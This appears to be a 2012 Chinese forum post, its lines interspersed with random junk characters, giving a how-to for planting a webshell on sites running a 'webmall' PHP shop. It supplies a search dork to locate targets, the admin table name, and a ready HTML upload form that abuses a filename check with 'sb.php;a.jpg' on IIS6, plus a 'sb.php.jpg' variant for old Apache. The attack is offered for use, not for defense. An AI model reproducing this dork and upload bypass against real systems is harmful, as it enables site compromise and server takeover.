关键字:inurl:webmall/detail.php?id
$ i5 [8 a4 F0 o; |5 G3 l5 f: a. e1 U }5 ^& j) X* c7 H
数据表:pwn_base_admin/ K9 m& l6 G; z, O0 A; n. b
" C6 K7 x6 O% _
关于拿shell
7 n& m ?8 M5 I" A# ^ d/ z1 h0 ~1 ~2 [! f) v/ u
首先登录后台admin.php$ q+ R* {9 k" ^ |3 Q. J
: `1 U/ \+ F2 P+ f+ \3 r
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。* _. n( X* M! m7 w
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
. @* c8 ?6 i4 _8 x9 J$ s然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
! o8 [2 A; t3 |" q/ F<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> + `! P# w' j% Q* X& A# U
<input type="text" name="fileName" value="sb.php;a.jpg" />
" w- Y. [" d. g* K- @4 O: r. x3 {<input type="hidden" name="attachPath" value="news/pics/" />
: E2 f l* I% V: ?4 Y+ U( i1 R<input type="file" name="fileData" size="14" /></td> % G I) Q/ ?7 _7 M, R( \
<input type="submit" name="button" value="确定" /> * _$ n# B S4 X6 E4 V
</form>
% E+ g% H+ [# w $ i4 Z0 |$ d3 m( ^+ j2 Q- d- E& v
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。# z; G f3 O2 O; k5 j3 q/ I
5 h7 s. v7 \2 A1 B; t |
发表于 2012-11-9 20:52:15
收藏
支持
反对